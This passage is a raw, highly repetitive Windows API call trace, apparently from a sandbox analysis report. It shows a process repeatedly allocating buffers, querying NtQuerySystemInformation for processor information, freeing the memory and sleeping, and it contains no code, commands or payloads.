[0209.021] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.021] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.023] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.023] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.024] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.025] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.025] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.031] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.042] Sleep (dwMilliseconds=0x110) [0209.061] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.062] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.062] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.062] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.063] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.063] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.063] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.064] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.064] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.064] Sleep (dwMilliseconds=0x110) [0209.075] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.076] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.076] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.076] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.077] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.077] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.077] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.078] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.078] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.078] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.079] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.080] Sleep (dwMilliseconds=0x110) [0209.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.091] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.091] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.091] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.092] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.092] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.092] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.093] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.093] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.093] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.094] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.095] Sleep (dwMilliseconds=0x110) [0209.106] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.106] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.107] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.107] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.107] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.108] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.108] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.109] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.109] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.110] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.110] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.111] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.111] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.111] Sleep (dwMilliseconds=0x110) [0209.122] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.122] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.123] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.123] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.123] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.124] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.124] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.125] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.125] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.125] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.126] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.126] Sleep (dwMilliseconds=0x110) [0209.138] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.138] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.140] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.140] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.140] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.141] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.141] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.141] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.142] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.142] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.142] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.143] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.143] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.144] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.144] Sleep (dwMilliseconds=0x110) [0209.154] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.154] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.154] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.155] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.155] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.155] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.156] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.156] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.156] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.157] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.157] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.158] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.158] Sleep (dwMilliseconds=0x110) [0209.171] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.171] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.171] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.172] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.172] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.172] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.173] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.173] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.173] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.174] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.174] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.175] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.175] Sleep (dwMilliseconds=0x110) [0209.232] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.232] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.233] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.233] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.233] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.234] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.234] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.234] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.235] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.235] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.235] Sleep (dwMilliseconds=0x110) [0209.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.249] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.249] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.249] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.250] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.250] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.250] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.251] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.251] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.251] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.252] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.252] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.252] Sleep (dwMilliseconds=0x110) [0209.267] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.267] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.268] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.268] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.268] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.269] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.269] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.269] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.270] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.270] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.270] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.271] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.271] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.271] Sleep (dwMilliseconds=0x110) [0209.280] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.280] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.281] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.281] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.281] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.282] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.282] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.283] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.283] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.283] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.284] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.284] Sleep (dwMilliseconds=0x110) [0209.296] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.296] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.297] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.297] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.297] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.298] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.298] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x29585b8 [0209.298] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.299] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.299] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x29585b8 [0209.300] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0209.300] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.304] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x29585b8 [0209.305] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.305] Sleep (dwMilliseconds=0x110) [0209.311] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x29585b8 [0209.311] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x29585b8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x29585b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0209.312] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x29585b8 | out: hHeap=0x2560000) returned 1 [0209.312] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x29585b8 [0209.312] NtQuerySystemInformation (in: SystemInformationClass=0x8, 